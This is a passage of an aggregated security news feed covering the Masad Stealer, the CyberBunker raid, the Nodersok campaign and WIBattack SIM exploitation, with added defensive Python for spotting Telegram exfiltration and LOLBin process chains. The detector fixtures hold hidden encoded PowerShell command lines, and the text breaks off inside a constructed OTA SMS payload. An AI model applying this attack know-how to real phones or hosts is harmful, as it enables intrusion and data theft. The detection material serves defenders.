Security researchers at Juniper Threat Labs discovered a strain of malware dubbed Masad Stealer that is being actively distributed. The malware steals files, browser information and cryptocurrency wallet data and sends them to the botmasters using a Telegram bot.

“The malware is being advertised on black market forums as “Masad Clipper and Stealer”. It steals browser data, which might contain usernames, passwords and credit card information. Masad Stealer also automatically replaces cryptocurrency wallets from the clipboard with its own.” reads the analysis published by the experts.

“Masad Stealer sends all of the information it collects – and receives commands from – a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers.”

The Masad Stealer is written in AutoIt script and compiled into a Windows executable. Most of the samples analyzed by the experts were about 1.5 MiB in size, but the experts noted that larger executables can be found bundled into other applications.

The malware appears to be linked to another threat dubbed “Qulab Stealer”. 

Crooks are advertising the malware on hacking forums as a stealer and clipper; the ‘fully-featured’ variant is offered for sale at $85.

Masad Stealer is distributed by masquerading as a legitimate tool or by being bundled into third-party tools, such as CCleaner and ProxySwitcher.

Attackers attempt to trick users into downloading the malware by advertising it in forums, on third party download sites or on file sharing sites.

Victims can also get infected by installing tainted versions of popular software, game cracks and cheats.

Once it has infected a machine, Masad Stealer collects a wide range of data, including system info, screenshots, desktop text files, Steam Desktop Authenticator sessions, cryptocurrency wallets, browser cookies, usernames, passwords and credit card data stored in browsers.

Masad Stealer is also able to automatically replace Monero, Bitcoin Cash, Litecoin, Neo and Web Money cryptocurrency wallet addresses in the clipboard with its own.

The malware achieves persistence by creating a scheduled task on every Windows machine it infects.

Once the malware has collected the information from the victim’s computer, it zips it using a 7zip executable bundled within its binary and then exfiltrates the data to the command and control (C2) server using unique Telegram bot IDs.

The analysis of the unique Telegram bot IDs and usernames associated with the malware allowed the experts to determine that there are at least 18 threat actors or campaigns actively targeting potential victims with the Masad Stealer.

“Of the more than 1,000 samples we identified to be variants of this malware, there were 338 unique Telegram Command and Control bot IDs. From this data, we can estimate the number of threat actors – or at least the number of different campaigns being run using the Masad Stealer malware – and the size of their operations,” continues the report.
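Defenders can apply the same bot-ID reasoning to their own telemetry. As an added example (not Juniper's code and not from the article), the Python below parses outbound proxy log lines, pulls the token out of Telegram Bot API URLs (https://api.telegram.org/bot<token>/<method>, where the token begins with the numeric bot ID) and groups the traffic by bot ID and client. That surfaces both how many distinct bots are being contacted from the network and which hosts are uploading files to them, which is the exfiltration behaviour described above. The log format, IP addresses and tokens are all constructed for the example.

```python
"""Group outbound Telegram Bot API traffic by bot ID (added example, not Juniper's code).
Bot API calls have the form https://api.telegram.org/bot<token>/<method>, where the token
is "<numeric bot id>:<secret>". The log format and every line below are constructed."""
import re
from collections import defaultdict

BOT_CALL_RE = re.compile(r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendAudio", "sendVideo"}

# Constructed proxy log: timestamp client_ip http_method url status
SAMPLE_PROXY_LOG = """\
2019-09-27T10:01:12Z 10.0.0.15 POST https://api.telegram.org/bot100000001:AAAAexampletoken1/sendDocument 200
2019-09-27T10:01:13Z 10.0.0.15 POST https://api.telegram.org/bot100000001:AAAAexampletoken1/sendMessage 200
2019-09-27T10:05:40Z 10.0.0.23 GET https://api.telegram.org/bot100000002:BBBBexampletoken2/getUpdates 200
2019-09-27T10:06:02Z 10.0.0.42 GET https://www.example.org/ 200
2019-09-27T10:07:55Z 10.0.0.15 POST https://api.telegram.org/bot100000002:BBBBexampletoken2/sendDocument 200
"""


def parse_bot_calls(log_text: str):
    """Yield (client_ip, bot_id, method) for each Bot API call in the log."""
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        m = BOT_CALL_RE.search(fields[3])
        if m:
            yield fields[1], m.group(1), m.group(3)


def summarise_bots(log_text: str) -> dict:
    """Per bot ID: which clients talked to it, which methods they used, how many uploads."""
    by_bot = defaultdict(lambda: {"clients": set(), "methods": set(), "uploads": 0})
    for client, bot_id, method in parse_bot_calls(log_text):
        entry = by_bot[bot_id]
        entry["clients"].add(client)
        entry["methods"].add(method)
        if method in UPLOAD_METHODS:
            entry["uploads"] += 1
    return dict(by_bot)


def uploading_clients(log_text: str) -> set:
    """Hosts that pushed files to any bot: the exfiltration signal worth triaging first."""
    return {client for client, _, method in parse_bot_calls(log_text) if method in UPLOAD_METHODS}


if __name__ == "__main__":
    summary = summarise_bots(SAMPLE_PROXY_LOG)
    print(f"{len(summary)} distinct bot IDs")
    for bot_id, e in summary.items():
        print(bot_id, sorted(e["clients"]), sorted(e["methods"]), "uploads:", e["uploads"])
    print("clients uploading:", sorted(uploading_clients(SAMPLE_PROXY_LOG)))
```

The bot ID survives as a grouping key even when the same token is reused across many infected hosts, so one workstation contacting two different bots (10.0.0.15 in the sample) reads as two campaigns touching one victim, which matches the way the report counts operators from samples. Most enterprise workstations have no business reason to call the Bot API at all, so even a single sendDocument from a desktop is worth a look.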

Juniper Threat Labs pointed out that Masad Stealer is an active threat and the malicious code is still available for purchase on the black market.

Experts also published a list of indicators of compromise (IOCs) with malware sample hashes and domains involved in the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Masad Stealer Malware exfiltrates data via Telegram appeared first on Security Affairs.

Learn Kali Linux The Easy Way Getting Started With Kali Linux

Learn Kali Linux: Welcome to HackingVision. You have installed Kali Linux and you’re wondering how to use some of the popular and powerful tools included in the Kali Linux operating system. Don’t worry, we have put together some tips and tutorials to help you ... Read more

The post Learn Kali Linux The Easy Way Getting Started With Kali Linux appeared first on HackingVision.

German Cops Raid “Cyberbunker 2.0,” Arrest 7 in Child Porn, Dark Web Market Sting

German authorities said Friday they’d arrested seven people and were investigating six more in connection with the raid of a Dark Web hosting operation that allegedly supported multiple child porn, cybercrime and drug markets with hundreds of servers buried inside a heavily fortified military bunker. Incredibly, for at least two of the men accused in the scheme, this was their second bunker-based hosting business that was raided by cops and shut down for courting and supporting illegal activity online.

The latest busted cybercrime bunker is in Traben-Trarbach, a town on the Mosel River in western Germany. The Associated Press says investigators believe the 13-acre former military facility served a number of dark web sites, including: the “Wall Street Market,” a sprawling, online bazaar for drugs, hacking tools and financial-theft wares before it was taken down earlier this year; the drug portal “Cannabis Road;” and the synthetic drug market “Orange Chemicals.”

German police reportedly seized $41 million worth of funds allegedly tied to these markets, and more than 200 servers that were operating throughout the underground temperature-controlled, ventilated and closely guarded facility.

The former military bunker in Germany that housed CyberBunker 2.0 and, according to authorities, plenty of very bad web sites.

The authorities in Germany haven’t named any of the people arrested or under investigation in connection with CyberBunker’s alleged activities, but said those arrested were apprehended outside of the bunker. Still, there are clues in the details released so far, and those clues have been corroborated by sources who know two of the key men allegedly involved.

We know the owner of the bunker hosting business has been described in media reports as a 59-year-old Dutchman who allegedly set it up as a “bulletproof” hosting provider that would provide Web site hosting to any business, no matter how illegal or unsavory.

We also know the German authorities seized at least two Web site domains in the raid, including the domain for ZYZTM Research in The Netherlands (zyztm[.]com), and cb3rob[.]org.

A “seizure” placeholder page left behind by German law enforcement agents after they seized cb3rob.org, an affiliate of the CyberBunker bulletproof hosting facility owned by convicted Dutch cybercriminal Sven Kamphuis.

According to historic whois records maintained by Domaintools.com, Zyztm[.]com was originally registered to a Herman Johan Xennt in the Netherlands. Cb3rob[.]org was an organization hosted at CyberBunker registered to Sven Kamphuis, a self-described anarchist who was convicted several years ago for participating in a large-scale attack that briefly impaired the global Internet in some places.

Both 59-year-old Xennt and Mr. Kamphuis worked together on a previous bunker-based project — a bulletproof hosting business they sold as “CyberBunker” and ran out of a five-story military bunker in The Netherlands.

That’s according to Guido Blaauw, director of Disaster-Proof Solutions, a company that renovates and resells old military bunkers and underground shelters. Blaauw’s company bought the 12,500 square-meter Netherlands bunker from Mr. Xennt in 2011 for $700,000.

Guido Blaauw, in front of the original CyberBunker facility in the Netherlands, which he bought from Mr. Xennt in 2011. Image: Blaauw.

Media reports indicate that in 2002 a fire inside the CyberBunker 1.0 facility in The Netherlands summoned emergency responders, who discovered a lab hidden inside the bunker that was being used to produce the drug ecstasy/XTC.

Blaauw said nobody was ever charged for the drug lab, which was blamed on another tenant in the building. Blaauw said Xennt and others in 2003 were then denied a business license to continue operating in the bunker, and they were forced to resell servers from a different location — even though they bragged to clients for years to come about hosting their operations from an ultra-secure underground bunker.

“After the fire in 2002, there was never any data or servers stored in the bunker,” in The Netherlands, Blaauw recalled. “For 11 years they told everyone [the hosting servers were] in this ultra-secure bunker, but it was all in Amsterdam, and for 11 years they scammed all their clients.”

Firefighters investigating the source of a 2002 fire at the CyberBunker’s first military bunker in The Netherlands discovered a drug lab amid the Web servers. Image: Blaauw.

Blaauw said sometime between 2012 and 2013, Xennt purchased the bunker in Traben-Trarbach, Germany — a much more modern structure that was built in 1997. CyberBunker was reborn, and it began offering many of the same amenities and courted the same customers as CyberBunker 1.0 in The Netherlands.

“They’re known for hosting scammers, fraudsters, pedophiles, phishers, everyone,” Blaauw said. “That’s something they’ve done for ages and they’re known for it.”

The former Facebook profile picture of Sven Olaf Kamphuis, shown here standing in front of Cyberbunker 1.0 in The Netherlands.

About the time Xennt and company were settling into their new bunker in Germany, he and Kamphuis were engaged in a fairly lengthy and large series of distributed denial-of-service (DDoS) attacks aimed at sidelining a number of Web sites — particularly anti-spam organization Spamhaus. A chat record of that assault, detailed in my 2016 piece, Inside the Attack that Almost Broke the Internet, includes references to and quotes from both Xennt and Kamphuis.

Kamphuis was later arrested in Spain on the DDoS attack charges. He was convicted in The Netherlands and sentenced to time served, which was approximately 55 days of detention prior to his extradition to the United States.

Some of the 200 servers seized from CyberBunker 2.0, a “bulletproof” web hosting facility buried inside a German military bunker. Image: swr.de.

The AP story mentioned above quoted German prosecutor Juergen Bauer saying the 59-year-old main suspect in the case was believed to have links to organized crime.

A 2015 exposé (PDF) by the Irish newspaper The Sunday World compared Mr. Xennt (pictured below) to a villain from a James Bond movie, and said he has been seen frequently associating with another man: an Irish mobster named George “the Penguin” Mitchell, listed by Europol as one of the top-20 drug traffickers in Europe and thought to be involved in smuggling heroin, cocaine and ecstasy.

Cyberbunkers 1.0 and 2.0 owner and operator Mr. Xennt, top left, has been compared to a “Bond villain.” Image: The Sunday World, July 26, 2015.

Blaauw said he doesn’t know whether Kamphuis was arrested or named in the investigation, but added that people who know him and can usually reach him have not heard from Kamphuis over several days.

Here’s what the CyberBunker in The Netherlands looked like back in the early aughts when Xennt still ran it:

Here’s what it looks like now after being renovated by Blaauw’s company and designed as a security operations center (SOC):

The former CyberBunker in the Netherlands, since redesigned as a security operations center by its current owner. Image: Blaauw.

I’m glad when truly bad guys doing bad stuff like facilitating child porn are taken down. The truth is, almost anyone trafficking in the kinds of commerce these guys courted also is building networks of money laundering business that become very tempting to use or lease out for other nefarious purposes, including human trafficking, and drug trafficking.

Nodersok malware delivery campaign relies on advanced techniques

Microsoft researchers observed a campaign delivering malware, dubbed Nodersok, relying on advanced techniques and elusive network infrastructure.

Microsoft experts observed a malware campaign, tracked as Nodersok, relying on advanced techniques and elusive network infrastructure. Microsoft uncovered the campaign in mid-July when it noticed patterns in the anomalous usage of MSHTA.exe.

Nodersok abuses legitimate tools, also called living-off-the-land binaries (LOLBins). Researchers observed the threat actors dropping two legitimate tools onto infected machines: Node.exe, the Windows build of the popular Node.js runtime, and WinDivert, a network packet capture and manipulation utility.

“It’s not uncommon for attackers to download legitimate third-party tools onto infected machines (for example, PsExec is often abused to run other tools or commands).” reads the analysis published by Microsoft. “However, Nodersok went through a long chain of fileless techniques to install a pair of very peculiar tools with one final objective: turn infected machines into zombie proxies.”

The Nodersok campaign has already infected thousands of machines in the last several weeks. Most of the victims are located in the United States and Europe, and they are predominantly consumers. About 3% of the infected systems belong to organizations in different sectors, including education, professional services, healthcare, finance, and retail.

Nodersok campaign

The attack chain starts when the user runs an HTML Application (HTA) that is most likely delivered through compromised advertisements. The JavaScript code in the HTA file downloads a second-stage component that launches PowerShell.

The Powershell command downloads additional components. One of the second-stage instances of PowerShell downloads the legitimate node.exe tool, while another drops WinDivert packet capture library components.

Another PowerShell component runs a shellcode to use WinDivert for the filtering and modification of certain outgoing packets.

The final payload turns the infected machine into a proxy.

The attackers use WinDivert to intercept the packets that initiate outgoing TCP connections and modify them in a manner that likely benefits the attackers.
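The chain above is unusual enough to detect on the process tree alone: a browser-launched mshta.exe that spawns PowerShell, which in turn runs node.exe from a user-writable directory or writes a WinDivert driver to disk. The following check is an added example of that logic and is not Microsoft's code or part of the original post; it assumes process-creation and file-creation records shaped like Sysmon events (pid, ppid, image, command line, and pid, path), and the records it runs over are constructed, with illustrative paths and command lines.

```python
"""Flag the Nodersok-style LOLBin chain (mshta.exe -> powershell.exe -> node.exe / WinDivert)
over constructed, Sysmon-like process and file events. Added example, not Microsoft's detection."""
import ntpath

# Constructed process-creation records (assumed field names, not real telemetry).
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 201, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\u\AppData\Local\Temp\ad.hta"},
    {"pid": 202, "ppid": 201, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -enc AAAA"},
    {"pid": 203, "ppid": 202, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -enc BBBB"},
    {"pid": 204, "ppid": 203, "image": r"C:\Users\u\AppData\Local\Temp\node.exe",
     "cmd": "node.exe payload.js"},
    # Benign control: a developer runs Node.js from its normal install directory via cmd.exe.
    {"pid": 301, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 302, "ppid": 301, "image": r"C:\Program Files\nodejs\node.exe", "cmd": "node.exe app.js"},
]

# Constructed file-creation records: which process wrote which file.
FILE_EVENTS = [
    {"pid": 203, "path": r"C:\Users\u\AppData\Local\Temp\WinDivert64.sys"},
    {"pid": 302, "path": r"C:\Program Files\nodejs\node_modules\app\index.js"},
]

# Directories an unprivileged user can write to; legitimate node.exe rarely lives here.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def basename(path):
    return ntpath.basename(path).lower()


def build_index(events):
    return {e["pid"]: e for e in events}


def ancestors(index, pid, limit=32):
    """Return image basenames of the process and its ancestors, nearest first.
    Stops at an unknown parent, a loop, or the depth limit."""
    chain, seen = [], set()
    while pid in index and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(basename(index[pid]["image"]))
        pid = index[pid]["ppid"]
    return chain


def detect_nodersok_chain(events, file_events=()):
    """Return findings for node.exe processes descending from mshta.exe through PowerShell,
    node.exe running from a user-writable path, and WinDivert drivers/DLLs dropped by
    PowerShell under mshta.exe."""
    index = build_index(events)
    findings = []
    for e in events:
        if basename(e["image"]) != "node.exe":
            continue
        chain = ancestors(index, e["pid"])
        reasons = []
        if "mshta.exe" in chain and "powershell.exe" in chain:
            reasons.append("node.exe descends from mshta.exe via powershell.exe")
        if any(marker in e["image"].lower() for marker in USER_WRITABLE):
            reasons.append("node.exe running from a user-writable path")
        if reasons:
            findings.append({"pid": e["pid"], "chain": chain, "reasons": reasons})
    for f in file_events:
        name = basename(f["path"])
        if name.startswith("windivert") and name.endswith((".dll", ".sys")):
            chain = ancestors(index, f["pid"])
            if "powershell.exe" in chain and "mshta.exe" in chain:
                findings.append({"pid": f["pid"], "chain": chain,
                                 "reasons": [f"{name} written by PowerShell under mshta.exe"]})
    return findings


if __name__ == "__main__":
    for finding in detect_nodersok_chain(EVENTS, FILE_EVENTS):
        print(finding["pid"], " <- ".join(finding["chain"]), finding["reasons"])
```

The developer's node.exe (pid 302) produces no finding because its ancestry is cmd.exe and it runs from Program Files; the campaign's node.exe (pid 204) trips both indicators, and the PowerShell instance that wrote WinDivert64.sys is reported separately. In practice, mshta.exe spawning PowerShell at all is already worth alerting on in environments that do not use HTAs.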

“Both the distributed network infrastructure and the advanced fileless techniques allowed this campaign to fly under the radar for a while, highlighting how having the right defensive technologies is of utmost importance in order to detect and counter these attacks in a timely manner.” Microsoft concludes.

“If we exclude all the clean and legitimate files leveraged by the attack, all that remains are the initial HTA file, the final Node.js-based payload, and a bunch of encrypted files. Traditional file-based signatures are inadequate to counter sophisticated threats like this.”

Pierluigi Paganini

(SecurityAffairs – Nodersok, hacking)

The post Nodersok malware delivery campaign relies on advanced techniques appeared first on Security Affairs.

5 Digitally-Rich Terms to Define and Discuss with Your Kids

online privacy

Over the years, I’ve been the star of a number of sub-stellar parenting moments. More than once, I found myself reprimanding my kids for doing things that kids do — things I never stopped to teach them otherwise.

Like the time I reprimanded my son for not thanking his friend’s mother properly before we left a birthday party. He was seven when his etiquette deficit disorder surfaced. Or the time I had a meltdown because my daughter cut her hair off. She was five when she brazenly declared her scorn for the ponytail.

The problem: I assumed they knew.

Isn’t the same true when it comes to our children’s understanding of the online world? We can be quick to correct our kids when they fail to exercise the best judgment or handle a situation the way we think they should online.

But often what’s needed first is a parental pause to ask ourselves: Am I assuming they know? Have I taken the time to define and discuss the issue?

With that in mind, here are five digitally-rich terms dominating the online conversation. If possible, find a few pockets of time this week and start from the beginning — define the words, then discuss them with your kids. You may be surprised where the conversation goes.

5 digital terms that matter

Internet Privacy

Internet privacy is the personal privacy that every person is entitled to when they display, store, or provide information regarding themselves on the internet. 

Highlight: We see and use this word often but do our kids know what it means? Your personal information has value, like money. Guard it. Lock it down. Also, respect the privacy of others. Be mindful about accidentally giving away a friend’s information, sharing photos without permission, or sharing secrets. Remember: Nothing shared online (even in a direct message or private text) is private—nothing. Smart people get hacked every day.
Ask: Did you know that when you go online, websites and apps track your activity to glean personal information? What are some ways you can control that? Do you know why people want your data?
Act: Use privacy settings on all apps, turn off cookies in search engines, review privacy policies of apps, and create bullet-proof passwords.

Digital Wellbeing

Digital wellbeing (also called digital wellness) is an ongoing awareness of how social media and technology impacts our emotional and physical health.

Highlight: Every choice we make online can affect our wellbeing or alter our sense of security and peace. Focusing on wellbeing includes taking preventative measures, making choices, and choosing behaviors that help us build a healthy relationship with technology. Improving one’s digital wellbeing is an ongoing process.
Ask: What do you like to do online that makes you feel good about yourself? What kinds of interactions make you feel anxious, excluded, or sad? How much time online do you think is healthy?
Act:
Digital wellness begins at home. To help kids “curb the urge” to post so frequently, give them a “quality over quantity” challenge. Establish tech curfews and balance screen time to green time. Choose apps and products that include wellbeing features in their design. Consider security software that blocks inappropriate apps, filters disturbing content, and curbs screen time.

Media Literacy

Media literacy is the ability to access, analyze, evaluate, and create media in a variety of forms. It’s the ability to think critically about the messages you encounter.

Highlight: Technology has redefined media. Today, anyone can be a content creator and publisher online, which makes it difficult to discern the credibility of the information we encounter. The goal of media literacy curriculum in education is to equip kids to become critical thinkers, effective communicators, and responsible digital citizens.
Ask: Who created this content? Is it balanced or one-sided? What is the author’s motive behind it? Should I share this?  How might someone else see this differently?
Act: Use online resources such as Cyberwise to explore concepts such as clickbait, bias, psychographics, cyberethics, stereotypes, fake news, critical thinking/viewing, and digital citizenship. Also, download Google’s new Be Internet Awesome media literacy curriculum.

Empathy

Empathy is stepping into the shoes of another person to better understand and feel what they are going through.

Highlight: Empathy is a powerful skill in the online world. Empathy helps dissolve stereotypes, perceptions, and prejudices. According to Dr. Michelle Borba, empathetic children practice nine habits that run contrary to today’s “selfie syndrome” culture. Empathy-building habits include moral courage, kindness, and emotional literacy. Without empathy, people can be “mean behind the screen” online. But remember: there are also a lot of people practicing empathy online who are genuine “helpers.” Be a helper.
Ask: How can you tell when someone “gets you” or understands what you are going through? How do they express that? Is it hard for you to stop and try to relate to what someone else is feeling or see a situation through their eyes? What thoughts or emotions get in your way?
Act:  Practice focusing outward when you are online. Is there anyone who seems lonely, excluded, or in distress? Offer a kind word, an encouragement, and ask questions to learn more about them. (Note: Empathy is an emotion/skill kids learn over time with practice and parental modeling).

Cyberbullying

Cyberbullying is the use of technology to harass, threaten, embarrass, shame, or target another person online.

Highlight: Not all kids understand the scope of cyberbullying, which can include spreading rumors, sending inappropriate photos, gossiping, subtweeting, and excessive messaging. Kids often mistake cyberbullying for digital drama and overlook abusive behavior. While kids are usually referenced in cyberbullying, the increase in adults involved in online shaming, unfortunately, is quickly changing that ratio.
Ask: Do you think words online can hurt someone in a way, more than words said face-to-face? Why? Have you ever experienced cyberbullying? Would you tell a parent or teacher about it? Why or why not?
Act: Be aware of changes in your child’s behavior and pay attention to his or her online communities. Encourage kids to report bullying (aimed at them or someone else). Talk about what it means to be an Upstander when bullied. If the situation is unresolvable and escalates to threats of violence, report it immediately to law enforcement.

We hope these five concepts spark some lively discussions around your dinner table this week. Depending on the age of your child, you can scale the conversation to fit. And don’t be scared off by eye rolls or sighs, parents. Press into the hard conversations and be consistent. Your voice matters in their noisy, digital world.

The post 5 Digitally-Rich Terms to Define and Discuss with Your Kids appeared first on McAfee Blogs.

German police arrest suspects in raid network hosting Darknet marketplaces

German police have shut down a network hosting Darknet marketplaces focused on the trading of drugs, stolen data and child pornography.

German police announced to have shut down a network hosting Darknet black marketplaces trading drugs, stolen data, and child pornography.

The black marketplaces were also offering stolen data and fake documents, and other illegal goods.

Authorities conducted an investigation into the operators of the “Bulletproof Hoster” service that was provided through servers hidden in a former NATO bunker, the so-called “Cyber Bunker.”

Law enforcement arrested seven suspects in a series of raids: four Dutch citizens, two Germans and one Bulgarian.

“Thursday’s raids involved hundreds of officers and came after years of following up on leads in cooperation with other agencies. Police believe that the data center was involved in a hack attack three years ago on the national communications provider, Telekom.” reported the DW agency.

“Officials said the server seized on Thursday had also hosted the second-largest darknet trading platform, Wall Street Market.  Authorities in the European Union and the US shut that platform down in May, claiming it was used to traffick stolen data, forged documents, computer malware and illicit drugs.”

According to prosecutors, the criminal ring behind the illegal network was composed of at least thirteen members, 12 men and one woman, aged from 20 to 59. The suspects ran the powerful servers inside the former NATO bunker in the town of Traben-Trarbach in Rhineland-Palatinate state.

The operation involved hundreds of police officers in Germany and other European countries; they seized 200 servers, numerous data carriers and mobile phones, and a large sum of cash.

The police also confirmed that the popular “Wall Street Market” black marketplace was hosted on the seized servers. In May, the German police, with the support of Europol, Dutch police and the FBI, shut down one of the world’s largest black marketplaces on the dark web, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three German nationals were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

That operation also led to the arrest of two major suppliers of illegal narcotics in the United States.

Prosecutors also revealed that the same cyber bunker was used to host the C2 behind a botnet involved in a massive attack that hit the German provider Deutsche Telekom in November 2016.

Pierluigi Paganini

(SecurityAffairs – darknet, hacking)

The post German police arrest suspects in raid network hosting Darknet marketplaces appeared first on Security Affairs.

Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada

A series of cyber attacks hit the defense contractors Rheinmetall AG and Defence Construction Canada (DCC) causing the disruption of their information technology systems.

This month a series of cyber attacks hit defense contractors Rheinmetall AG and Defence Construction Canada (DCC), disrupting their information technology systems.

German Rheinmetall AG is a market leader in the supply of military technology; in 2019 the group generated sales of $6.9 billion. DCC is a Crown corporation that delivers infrastructure and environmental projects for the defence of Canada.

Malware-based attacks have hit the IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico, and the USA since late on the evening of 24 September 2019.

The attacks impacted the production processes at these plants causing significant disruption.

“The IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico and the USA has been affected by malware attacks since late on the evening of 24 September 2019. As a result, normal production processes at these locations are currently experiencing significant disruption.” reads a press release published by the company.

“According to the latest information, the Group’s other IT systems have not been affected.”

Rheinmetall AG claims it is doing everything in its power to address the resulting disruption.

The company says it can assure deliverability in the short term, but at this time it is not possible to predict the length of the disruption.

“The most likely scenarios suggest a period lasting between two and four weeks.” continues the press release. “As things stand, the Group expects the malware event to have an adverse impact on operating results of between €3 million and €4 million per week starting with week two.”

Early this month, a cyberattack also disrupted the information technology systems of Defence Construction Canada.

“The Crown Corporation that manages Defence department projects and infrastructure has been hit with a cyber-attack.” reported the Ottawa Sun.

“Industry sources say an attack earlier this month disrupted Defence Construction Canada’s computer systems and has led to ongoing issues with procurement and other projects.”

DCC is still working to restore its IT systems and has launched an investigation into the cyber attack; the organization pointed out that there are no delays to projects that it is managing on behalf of DND.

“All DCC site offices across Canada are open and work has continued on all projects that DCC is managing on behalf of DND and its other clients, she noted in an email.” continues the post.

“There are no delays to projects that DCC is managing on behalf of DND due to this incident,” said Stephanie Ryan, director of communications with Defence Construction Canada.

At this time there are no technical details about either cyber attack; experts believe that the systems were infected by ransomware, which caused the disruption of internal operations.

Pierluigi Paganini

(SecurityAffairs – Rheinmetall, hacking)

The post Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada appeared first on Security Affairs.

After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk

Researchers are warning of a new variant of recently disclosed SimJacker attack, dubbed WIBattack, that could expose millions of mobile phones to remote hacking.

WIBattack is a new variant of the recently discovered Simjacker attack method that could expose millions of mobile phones to remote hacking.

A couple of weeks ago, cybersecurity researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in at least 30 countries. The experts discovered that the exploitation of the vulnerability is independent of the model of phone used by the victim.

The scary part of the story is that a private surveillance firm has been aware of the zero-day flaw for at least two years and is actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

Following the disclosure of the Simjacker attack, the researcher Lakatos from Ginno Security Lab discovered that another dynamic SIM toolkit, called Wireless Internet Browser (WIB), can be exploited in a similar way.

Lakatos first discovered this vulnerability back in 2015, but he did not publicly disclose it because the flaw is hard to patch and could be abused by threat actors to remotely take over phones running vulnerable SIMs.

“We researched security in simcard and discovered the vulnerability in WIB simcard-browser that causes serious harm to hundreds of millions of telecom subscribers worldwide in 2015, and the vulnerability has not ever been published yet.” reads a blog post published by the researcher.

“By sending a malicious SMS to victim phone number, attacker can abuse the vulnerabilities in the WIB sim browser to remotely take control of the victim mobile phone to perform harmful actions such as: send sms, make phone call, get victim’s location, launch other browsers (e.g WAP browser), get victim’s IMEI, etc.”

The researcher also claimed to have discovered the flaw in S@T Browser and disclosed a video PoC of the Simjacker with details that have not yet been published by AdaptiveMobile Security researchers.

The flaw in both S@T and WIB Browsers can be exploited to perform several malicious tasks by sending an SMS containing a spyware-like code.

Back to the WIBattack: the WIB toolkit was created by SmartTrust, a company that provides SIM toolkit-based browsing solutions to hundreds of mobile operators worldwide, including AT&T, Etisalat, KPN, TMobile, Telenor, and Vodafone.

Like the S@T Browser, WIB toolkit has also been designed to allow mobile carriers to provide some essential services, subscriptions, and value-added services over-the-air to the customers. It also allows changing core network settings on their devices.

“OTA is based on client/server architecture where at one end there is an operator back-end system (customer care, billing system, application server…) and at the other end there is a SIM card,” continues the researcher.

The flaw in the WIB toolkit could be exploited to:

  • Retrieve the target device’s location and IMEI
  • Send fake messages on behalf of the victim
  • Distribute malware by launching the victim’s phone browser and visiting a malicious web page
  • Dial premium-rate numbers
  • Call the attacker’s phone number to spy on the victim’s surroundings via the device’s microphone
  • Perform denial-of-service attacks by disabling the SIM card
  • Retrieve target device info (e.g. language, radio type, battery level)

Below is the attack scenario described by the expert:


(1) Attacker sends a malicious OTA SMS to the victim phone number. The OTA SMS contains WIB command such as: SETUP CALL, SEND SMS, PROVIDE LOCATION INFO, etc.

(2) Right after receiving the OTA SMS, the Baseband Operating System of the victim mobile phone uses the ENVELOPE COMMAND (an APDU command to communicate between mobile phone and simcard) to forward the TPDU of the OTA SMS to the WIB browser in the victim’s simcard. Different from the procedure of receiving a normal text sms, the OTA SMS procedure is silently handled just in the baseband operating system and does not raise any alert to the application operating system (android os, ios, blackberry os, …). Neither feature phones nor smart phones raise an alert about the procedure of ota sms: no ringing, no vibration, no detection from users.

(3) WIB browser follows the WIB commands inside the TPDU of OTA SMS and sends the corresponding PROACTIVE COMMAND to the victim mobile phone such as: SETUP CALL, SEND SMS, PROVIDE LOCATION INFO.

(4) The victim mobile phone follows the PROACTIVE COMMAND received from victim’s simcard to perform the corresponding actions such as: make a phone call, send an sms to whatever phone number attacker wants (e.g receiver mobile phone in the figure).
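What makes step (2) silent is visible in two header octets of the SMS-DELIVER TPDU: a TP-PID of 0x7F ((U)SIM Data Download) together with a class-2 TP-DCS such as 0xF6 tells the handset to hand the message to the SIM via ENVELOPE (SMS-PP Download) instead of showing it, and the TP-UD then carries a 3GPP TS 23.048 command packet whose SPI field says whether any cryptographic check was requested at all. The parser below is an added example (mine, not the researcher's, SRLabs' or AdaptiveMobile's code) of recognising such a message and reading that header; field layouts follow 3GPP TS 23.040 and TS 23.048, the two PDUs are constructed, and the TAR value AABBCC and the payload bytes are placeholders rather than the real WIB or S@T identifiers.

```python
"""Parse an SMS-DELIVER TPDU, flag (U)SIM Data Download (OTA) messages and decode the
TS 23.048 command-packet header. Added example; PDUs below are constructed."""

# Constructed SMS-DELIVER TPDUs (SMSC address omitted). Sender +12345678901, 2019-09-28.
TEXT_TPDU = "04" "0B91" "2143658709F1" "00" "00" "91908241520080" "05" "E8329BFD06"  # "hello"
OTA_TPDU = ("04" "0B91" "2143658709F1" "7F" "F6" "91908241520080" "14"
            # TS 23.048 command packet: CPL=18, CHL=13, SPI=0000 (no RC/CC/DS, no cipher),
            # KIc=00, KID=00, TAR=AABBCC (placeholder), CNTR=1, PCNTR=0, 4 bytes payload.
            "0012" "0D" "0000" "00" "00" "AABBCC" "0000000001" "00" "DEADBEEF")


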